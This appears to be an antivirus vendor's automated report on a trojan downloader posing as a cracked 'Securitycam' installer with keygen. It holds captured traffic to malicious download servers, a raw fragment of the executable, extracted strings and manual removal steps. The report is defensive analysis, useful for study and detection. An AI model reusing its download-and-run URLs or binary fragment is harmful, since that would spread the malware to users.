A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: bwaHeZCXP2SAcm
C4jPfeH-G1a9BQ1pES7fbFCdLAgvV78EFo8G8Wag==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..
GET /stub_maker.php?program=sevenzip&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP] HTTP/1.0
Host: dl.wold3a.space
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 66832
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5708ba927f409.exe"
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2016 08:17:22 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3a3025640eaad9970531c0d9450c1606.cloudfront.net (CloudFront)
X-Amz-Cf-Id: XaFaWQnaCJqm9MqhrEWJECh1HokaDAi8WL8VwmQjL1KF4N_HgQv4lg==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
.........................@.................................@..........
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
.........................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ<<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=1505&tid=4333077&b_typ=pe&n=U2VjdXJpdHljYW0gMS43LjAuNyBmaW5hbCBpbmNs&reb=1&ic= HTTP/1.0
Host: up.sdfuus98d7f.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1749
Connection: close
Date: Sat, 09 Apr 2016 08:19:05 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 544548a56effae388f72d320aa8e1891.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KIQ_NNz3FcVC5BsHjBQTvrk-vVaxLJGeyGLoiZNDdUnIBYMUzf5ElA==files=4.t1=dl.u1=hXXp://get.gribbyk.space/?affId=1006&appTitle=Securit
ycam%201.7.0.7%20final%20incl&s1=1505&s2=4333077&setupName=cpSet
up&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m
1=0.d1=0.t2=dl.u2=hXXp://get.file888desktop.info/?p=24718&d=30497&l=29
729&dynamicname=Securitycam%201.7.0.7%20final%20incl&filename=se
tup-1228&exeurl=http://d16oc15frjt76r.cloudfront.net/setup_ru.
exe>=get75&ts=14533669397&con=1&prl=1&d1=4333077&d2=1505.n2=setup-12
28.exe.b2=ru.c2=sevenzip-2.s2=0.m2=1.d2=1500.t3=dl.u3=hXXp://VVV.dosec
uretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&apps
etupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setu
p&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=h
ttp://pe-sixi.com/img/icon_installer.png.n3=Setup__2140_il2.
exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://stapi.sweetc
omet.com/api/stamp/setup.exe?&affiliateid=1780&productname=Securitycam
%201.7.0.7%20final%20incl&producturl=http://d3pccup19xda2t
.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pc
cup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&prod
ucteula=http://sevenzip.info/terms.html&productsize=1.06MB&pro
ductcmd=s&publishercontact=http://sevenzip.info&productbusine
ss=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&
subid=1505&subid2=4333077.n4=SevenZip-apset.exe.b4=ap.c4=sevenzip.s4=0
.m4=0.d4=0.t5=dl.u5=hXXp://sub.spirlymo.com/installers/cli/1460185<<< skipped >>>
POST hXXp://up2.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102d50ab7e32accc6e9cee7c3b2133&trackingId=30218577&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up2.dfiledownload28.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=1360&id[]=1361&id[]=1362&id[]=1363&id[]=631&id[]=632&id[]=1454&id[]=1455&id[]=1878&id[]=1879&id[]=1358&id[]=1359&id[]=1364&id[]=1365
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 09 Apr 2016 08:19:02 GMT
Connection: close
Content-Length: 344<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length
Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="t
ext/html; charset=us-ascii"></HEAD>..<BODY><h2>Le
ngth Required</h2>..<hr><p>HTTP Error 411. The reque
st must be chunked or have a content length.</p>..</BODY>&
lt;/HTML>....
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\RIzpib1Ppj.exe
&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp
rogram=sevenzip&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP]
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
System.dll
callback%d
nsy2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\FG
ram=sevenzip&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP]
l.wold3a.space/stub_maker.php?program=sevenzip&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201604090819
hXXp://dl.wold3a.space/stub_maker.php?program=sevenzip&tid=4333077&pid=1505&b_typ=pe&reb=1&name=Securitycam 1.7.0.7 final incl keygen core [240715BAP]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
%original file name%.exe_320_rwx_10004000_00001000:
callback%d
RIzpib1Ppj.exe_1792:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
O8,reA
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory on Reboot("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile on Reboot("%s")Delete: DeleteFile("%s")%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\cpSetup.exe"
39/SevenZip_downloader-QbloQ1W5H.exe
m%201.7.0.7%20final%20incl&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4333077
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\NSISdl.dll
1.1.1.6
Software\Microsoft\Windows\CurrentVersion\Internet Settings
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\cpSetup.exe"")ISdl.dll"
ycam%201.7.0.7%20final%20incl&s1=1505&s2=4333077&setupName=cpSetup&appVersion=2.92&instId=11
cup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4333077
Securitycam 1.7.0.7 final incl Setup
8984533
639/SevenZip_downloader-QbloQ1W5H.exe
oader-QbloQ1W5H.exe
cli/1460185279639/SevenZip_downloader-QbloQ1W5H.exe
123456789 /
ecuritycam 1.7.0.7 final incl
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\RIzpib1Ppj.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp
RIzpib1Ppj.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
7234412
hXXp://get.gribbyk.space/?affId=1006&appTitle=Securitycam%201.7.0.7%20final%20incl&s1=1505&s2=4333077&setupName=cpSetup&appVersion=2.92&instId=11
19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4333077
nloader-QbloQ1W5H.exe
hXXp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4333077&b_typ=pe&n=U2VjdXJpdHljYW0gMS43LjAuNyBmaW5hbCBpbmNs&reb=1&ic=
RIzpib1Ppj.exe_1792_rwx_10001000_00007000:
.text
`.rdata
@.data
.rsrc
@.reloc
/key=
cpSetup.exe_1820:
.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
zcÁ
:::#222.111 )))
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS></application></compatibility></assembly>< <$<(<,<0<4<~<
Bmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy4.tmp\cpSetup.exe
cpSetup.exe_1820_rwx_003A0000_0000D000:
.text
`.rdata
@.data
.rsrc
@.reloc
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
hXXp://
KERNEL32.dll
GetProcessHeap
:::#222.111 )))
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\898984533 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4.tmp\cpSetup.exe (15041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000753cb.a (1730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BNHLLA5Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000747c5.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F2WM3BJ6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1PMKWJTD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LNE6T972\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\FG (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\RIzpib1Ppj.exe (9088 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.